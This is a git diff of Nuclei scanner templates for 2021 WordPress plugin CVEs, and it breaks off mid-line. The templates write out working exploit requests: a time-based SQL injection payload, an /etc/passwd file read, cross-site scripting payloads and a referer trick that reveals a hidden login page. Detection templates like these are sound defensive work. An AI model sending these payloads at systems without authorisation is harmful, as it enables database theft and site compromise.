b/nuclei-templates/CVE-2021/CVE-2021-24862.yaml index 1c708803dc..1f03c3cb18 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24862.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24862.yaml @@ -6,19 +6,22 @@ info: severity: high description: | WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator. + impact: | + An authenticated attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version 5.0.1.6. reference: - https://wpscan.com/vulnerability/7d3af3b5-5548-419d-aa32-1f7b51622615 - https://wordpress.org/plugins/custom-registration-form-builder-with-submission-manager/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24862 - http://packetstormsecurity.com/files/165746/WordPress-RegistrationMagic-V-5.0.1.5-SQL-Injection.html + - https://github.com/ezelnur6327/ezelnur6327 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24862 cwe-id: CWE-89 - epss-score: 0.68026 - epss-percentile: 0.97645 + epss-score: 0.72686 + epss-percentile: 0.97816 cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: metagauss product: registrationmagic framework: wordpress - tags: wpscan,cve,wp-plugin,cve2021,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm + tags: cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss http: - raw: @@ -51,4 +54,4 @@ http: - 'status_code_2 == 200' - 'contains(body_3, "rm_user_role_mananger_form")' condition: and -# digest: 4b0a00483046022100cefde2325aafa29bdb96325ab1b6a3d8381e18bd82c8acbd73de5c108c0ee662022100af0361534a103a7d9a6e074d7f583353658fc7387f3beea4245e58dfcd1c16b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e291dd94c5d8a5cf0d02cbfdd5212108c69acd79b92db5c04881b59af89449040220781cf0b9c9e4ff06f64c490aaecc845f875e184b75df4413f58b712af3304d65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24875.yaml b/nuclei-templates/CVE-2021/CVE-2021-24875.yaml index 70a0b804a6..523b7e7fbc 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24875.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24875.yaml @@ -6,17 +6,21 @@ info: severity: medium description: | WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 3.0.39. reference: - https://wpscan.com/vulnerability/652efc4a-f931-4668-ae74-a58b288a5715 - https://nvd.nist.gov/vuln/detail/CVE-2021-24875 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24875 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.50003 + epss-percentile: 0.50097 cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +28,7 @@ info: vendor: implecode product: ecommerce_product_catalog framework: wordpress - tags: wp,authenticated,wpscan,ecommerce-product-catalog,cve,cve2022,xss,wordpress,wp-plugin + tags: cve2021,cve,wp,authenticated,wpscan,ecommerce-product-catalog,xss,wordpress,wp-plugin,implecode http: - raw: @@ -45,4 +49,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "eCommerce Product Catalog")' condition: and -# digest: 4a0a0047304502201595ed76f86df2b020d0c3114918533d6b49a8b1743f70f517a13785fb857e4d022100e1e737b9292818f90e14785202a3644ad7202ef89d53508d98017b39ec27bdef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090b957beb8440eaf4acf667c971c051694c39e18b33a8a8b31ae16d36d5f56fa0220598145a711dd9feeef1155fb5654ff6abd36cc88b7decadc8e3ea432ed896fbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24891.yaml b/nuclei-templates/CVE-2021/CVE-2021-24891.yaml index c312429522..660c2e8fab 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24891.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24891.yaml @@ -1,11 +1,10 @@ id: CVE-2021-24891 - info: - name: WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting + name: Elementor < 3.1.4 - DOM Cross-Site-Scripting author: dhiyaneshDk severity: medium description: | - WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash. + The Elementor Website Builder WordPress plugin before 3.1.4 does not sanitise or escape user input appended to the DOM via a malicious hash, resulting in a DOM Cross-Site Scripting issue. reference: - https://www.jbelamor.com/xss-elementor-lightox.html - https://wpscan.com/vulnerability/fbed0daa-007d-4f91-8d87-4bca7781de2d @@ -15,14 +14,12 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24891 cwe-id: CWE-79 - tags: wordpress,wp-plugin,elementor,wpscan,cve,cve2021,dom,xss - + tags: cve,cve2021,dom,xss,wordpress,wp-plugin,elementor requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js" - "{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9" - extractors: - type: regex name: version @@ -30,11 +27,9 @@ requests: regex: - "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)" internal: true - - type: kval kval: - version - req-condition: true matchers-condition: and matchers: @@ -42,9 +37,6 @@ requests: part: body_1 regex: - "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)" - - type: dsl dsl: - compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200 - -# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-24910.yaml b/nuclei-templates/CVE-2021/CVE-2021-24910.yaml new file mode 100644 index 0000000000..bd2581d33d --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24910.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-24910 +info: + name: Transposh WordPress < 1.0.7 - Reflected Cross-Site Scripting (XSS) + author: Screamy + severity: medium + reference: + - https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/ + - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt + - https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24910 + metadata: + verified: true + tags: cve,cve2021,wordpress,wp-plugin,xss,wp +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - '{"result":' + condition: and + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-24915.yaml b/nuclei-templates/CVE-2021/CVE-2021-24915.yaml index 037d8f28c5..c52440bb78 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24915.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24915.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24915 cwe-id: CWE-89 - epss-score: 0.19154 - epss-percentile: 0.95753 + epss-score: 0.22351 + epss-percentile: 0.96057 cpe: cpe:2.3:a:contest_gallery:contest_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,8 +25,8 @@ info: vendor: contest_gallery product: contest_gallery framework: wordpress - public-query: "/wp-content/plugins/contest-gallery/" - tags: cve,cve2021,wordpress,wp-plugin,wpscan,wp,contest-gallery + publicwww-query: "/wp-content/plugins/contest-gallery/" + tags: cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli http: - raw: @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022079507e924f48eab289803b7dfbeb9dbe0f3de89dde79fef4d9d8595cd75867a5022029bd1039c7f6496f93c779f281ae894c37277bfdd96fe3cef0b22e281d503159:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220029f49c1e9fa65765eaed8f0325876a75a3da15cad0b9597a1e000f69de3c11f0221008d79ba2600b7e68952c628b0a919d453f58c97dfbc68070006af2ede9825963b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24917.yaml b/nuclei-templates/CVE-2021/CVE-2021-24917.yaml index 8b1db86298..28a468b30b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24917.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24917.yaml @@ -1,25 +1,34 @@ id: CVE-2021-24917 info: - name: WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header + name: WordPress WPS Hide Login <1.9.1 - Information Disclosure author: akincibor severity: high - description: The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. + description: WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location. + impact: | + An attacker can gain sensitive information about the WordPress site, such as the login page URL. + remediation: Fixed in version 1.9.1. reference: - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24917 - https://nvd.nist.gov/vuln/detail/CVE-2021-24917 - remediation: Fixed in version 1.9.1 + - https://wordpress.org/support/topic/bypass-security-issue/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-24917 cwe-id: CWE-863 + epss-score: 0.03563 + epss-percentile: 0.90675 + cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve2021,wp,wordpress,wp-plugin,unauth,wpscan,cve + verified: true + max-request: 1 + vendor: wpserveur + product: wps_hide_login + framework: wordpress + tags: cve2021,cve,wp,wordpress,wp-plugin,unauth,wpscan,wpserveur -requests: +http: - raw: - | GET /wp-admin/options.php HTTP/1.1 @@ -28,16 +37,17 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - "!contains(tolower(location), 'wp-login.php')" + - type: word part: header words: - 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1' - - type: dsl - dsl: - - "!contains(tolower(location), 'wp-login.php')" - extractors: - type: kval kval: - location +# digest: 4b0a00483046022100aa02258a3fe31969b26abef88381abc8502bee1888b8beaa33762c32b70968cf0221008b4c288173be99e17f8cbfc8dec7f1a886966396d1bc254fb80b1ba526800975:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24926.yaml b/nuclei-templates/CVE-2021/CVE-2021-24926.yaml new file mode 100644 index 0000000000..8e4826b49b --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24926.yaml @@ -0,0 +1,56 @@ +id: CVE-2021-24926 + +info: + name: WordPress Domain Check <1.0.17 - Cross-Site Scripting + author: cckuailong + severity: medium + description: WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page. + remediation: | + Update to WordPress Domain Check plugin version 1.0.17 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24926 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24926 + cwe-id: CWE-79 + epss-score: 0.00171 + epss-percentile: 0.53153 + cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: domaincheckplugin + product: domain_check + framework: wordpress + tags: cve,cve2021,wpscan,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Domain Check" + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022100d0f4d9bfcc048f509d4adc32bc55b484ffb0c20b4119b906aae940c8cd858c120220778eacf2b57cdec131c557397df891c5923101ad74b0501c14fcd71964089258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24931.yaml b/nuclei-templates/CVE-2021/CVE-2021-24931.yaml index 26dfe36884..83aacd167d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24931.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24931.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: Fixed in version 2.8.2. reference: - https://wpscan.com/vulnerability/1cd52d61-af75-43ed-9b99-b46c471c4231 @@ -17,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24931 cwe-id: CWE-89 - epss-score: 0.68247 - epss-percentile: 0.97652 + epss-score: 0.58114 + epss-percentile: 0.97428 cpe: cpe:2.3:a:ays-pro:secure_copy_content_protection_and_content_locking:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: ays-pro product: secure_copy_content_protection_and_content_locking framework: wordpress - tags: wp-plugin,cve,wp,packetstorm,unauth,wpscan,cve2021,sqli,wordpress,secure-copy-content-protection + tags: cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro http: - raw: @@ -43,4 +45,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "{\"status\":true")' condition: and -# digest: 4a0a00473045022100ba017264be79b97f29ff7ebfeece80ac33b11bba74f89627075255d8c765338602207ca91db7265e04c70ed36552a528c84516675774c8a4fb12aaa2ff71d8b0532a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bd6a79cdc594a3023fb8e143f8b3806237e2d1b610802729545d42772e7340e10221008215d1a8a12f869971241e710ddfd7c6f663f9e5a94326ce397d081c4f966528:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24940.yaml b/nuclei-templates/CVE-2021/CVE-2021-24940.yaml index 6b0c52a02f..6eb73e7bd6 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24940.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24940.yaml @@ -6,20 +6,31 @@ info: severity: medium description: | WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in 5.9.8. reference: - https://wpscan.com/vulnerability/1980c5ca-447d-4875-b542-9212cc7ff77f - https://nvd.nist.gov/vuln/detail/CVE-2021-24940 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24940 cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42899 + cpe: cpe:2.3:a:woocommerce:persian-woocommerce:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp,xss,authenticated,wpscan,cve,cve2021,wordpress,wp-plugin + verified: true + max-request: 2 + vendor: woocommerce + product: persian-woocommerce + framework: wordpress + tags: cve2021,cve,wp,xss,authenticated,wpscan,wordpress,wp-plugin,woocommerce -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -27,20 +38,16 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1 Host: {{Hostname}} - req-condition: true - cookie-reuse: true matchers: - type: dsl dsl: - - contains(all_headers_2, "text/html") + - contains(header_2, "text/html") - status_code_2 == 200 - contains(body_2, 'accesskey=X onclick=alert(1) test=') - contains(body_2, 'woocommerce_persian_translate') condition: and - -# Enhanced by md on 2022/10/17 +# digest: 4b0a00483046022100b7047b7f826c9feeea2a1e804ec10dee788c3f73bf6a15b7f203b50f4b63af08022100b8021e9cb1d934188fbe23f2ce21be31736eec16f8f4d29453819a12fab97e43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24943.yaml b/nuclei-templates/CVE-2021/CVE-2021-24943.yaml index 7452908c5f..b85b13fc17 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24943.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24943.yaml @@ -1,43 +1,50 @@ id: CVE-2021-24943 info: - name: Registrations for the Events Calendar < 2.7.6 - Unauthenticated SQL Injection - author: akincibor + name: Registrations for the Events Calendar < 2.7.6 - SQL Injection + author: ritikchaddha severity: critical - description: The plugin does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.. + description: | + The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection. + remediation: Fixed in 2.7.6 reference: - - https://wpscan.com/vulnerability/ba50c590-42ee-4523-8aa0-87ac644b77ed - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://wpscan.com/vulnerability/ba50c590-42ee-4523-8aa0-87ac644b77ed/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24943 + - https://wordpress.org/plugins/registrations-for-the-events-calendar/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24943 + cwe-id: CWE-89 + epss-score: 0.21158 + epss-percentile: 0.96299 + cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: roundupwp + product: registrations_for_the_events_calendar + framework: wordpress + publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/" + tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar +variables: + text: "{{rand_base(5)}}" -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/registrations-for-the-events-calendar/readme.txt' +http: + - raw: + - | + @timeout: 20s + POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" + event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - matchers-condition: and matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Event Registration Plugin" - part: body - - type: dsl dsl: - - compare_versions(version, '< 2.7.6') \ No newline at end of file + - 'duration>=5' + - 'status_code == 200' + - 'contains(body, "Please enter the email you registered with")' + condition: and +# digest: 4b0a00483046022100b80877af0947d3a8a37e4c34281cf76f8f00154d90974a6dd87bf80d91980837022100eabb89ae18f62fe2508c9fdc28dc7316c524d8dc3a6d1cd28f28d8cc14f0b9f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24946.yaml b/nuclei-templates/CVE-2021/CVE-2021-24946.yaml index f02a7cddfe..77765a0524 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24946.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24946.yaml @@ -6,20 +6,33 @@ info: severity: critical description: | WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. + remediation: | + Upgrade to WordPress Modern Events Calendar version 6.1.5 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445 - https://wordpress.org/plugins/modern-events-calendar-lite/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24946 + - http://packetstormsecurity.com/files/165742/WordPress-Modern-Events-Calendar-6.1-SQL-Injection.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24946 cwe-id: CWE-89 + epss-score: 0.12445 + epss-percentile: 0.94942 + cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wordpress,wp-plugin,wp,unauth,wpscan,cve,cve2021,sqli,modern-events-calendar-lite + verified: true + max-request: 1 + vendor: webnus + product: modern_events_calendar_lite + framework: wordpress + tags: cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus -requests: +http: - raw: - | @timeout: 10s @@ -34,5 +47,4 @@ requests: - 'contains(content_type, "text/html")' - 'contains(body, "The event is finished") || contains(body, "been a critical error")' condition: and - -# Enhanced by md on 2023/01/06 +# digest: 4a0a004730450220639f36ec2923e5c1fa51bab912bd571fed2585b6cbe587796844a913eb606c6e022100d5fa2051f016ff2940ca7e37b26ed07563aa7272b2bc5f69a8a4b96dd0f549d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24947.yaml b/nuclei-templates/CVE-2021/CVE-2021-24947.yaml new file mode 100644 index 0000000000..9796ad8438 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24947.yaml @@ -0,0 +1,56 @@ +id: CVE-2021-24947 + +info: + name: WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read + author: cckuailong + severity: medium + description: WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information. + remediation: | + Update WordPress Responsive Vector Maps plugin to version 6.4.2 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24947 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/kazet/wpgarlic + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2021-24947 + cwe-id: CWE-352,CWE-863 + epss-score: 0.00315 + epss-percentile: 0.69672 + cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: thinkupthemes + product: responsive_vector_maps + framework: wordpress + tags: cve2021,cve,authenticated,wpscan,lfi,wp,wordpress,wp-plugin,lfr,thinkupthemes + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 +# digest: 4a0a004730450221008def46061f092b5a0c93c28264ab3a05066eaf001fe4abf17f6bb797222530eb02206027d16ad6b375a0bf8611d8873cea6d30f23a2c433cfcf607ec748b470ffabc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24956.yaml b/nuclei-templates/CVE-2021/CVE-2021-24956.yaml index e991b4464c..9b4a2d747b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24956.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24956.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 6.8.7 reference: - https://wpscan.com/vulnerability/5882ea89-f463-4f0b-a624-150bbaf967c2 @@ -16,7 +18,7 @@ info: cve-id: CVE-2021-24956 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.4302 + epss-percentile: 0.42122 cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +26,7 @@ info: vendor: adenion product: blog2social framework: wordpress - tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan + tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan,adenion http: - raw: @@ -55,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d088fca34ccfa0b8c2cfaf6c9794bb88c57c9ecd7c6769cadac99a714d3b0975022100b62cdc58b104f778e20d8a96a2ea2c6487ed994a5237bcbf82c0f9971f7bfe5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec04e3dad8ad65b066274ccd4a8a113b5ea1b447ef8a8ec31cda043e7556215b022048581b99f01c99ffc5343a1654aeb5b223cee073de6650038918f6053e24675b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24970.yaml b/nuclei-templates/CVE-2021/CVE-2021-24970.yaml index 10b2e51693..cdc485b1ed 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24970.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24970.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: Fixed in version 2.5.4. reference: - https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10 @@ -17,7 +19,7 @@ info: cve-id: CVE-2021-24970 cwe-id: CWE-22 epss-score: 0.03639 - epss-percentile: 0.90682 + epss-percentile: 0.90767 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: plugins360 product: all-in-one_video_gallery framework: wordpress - tags: 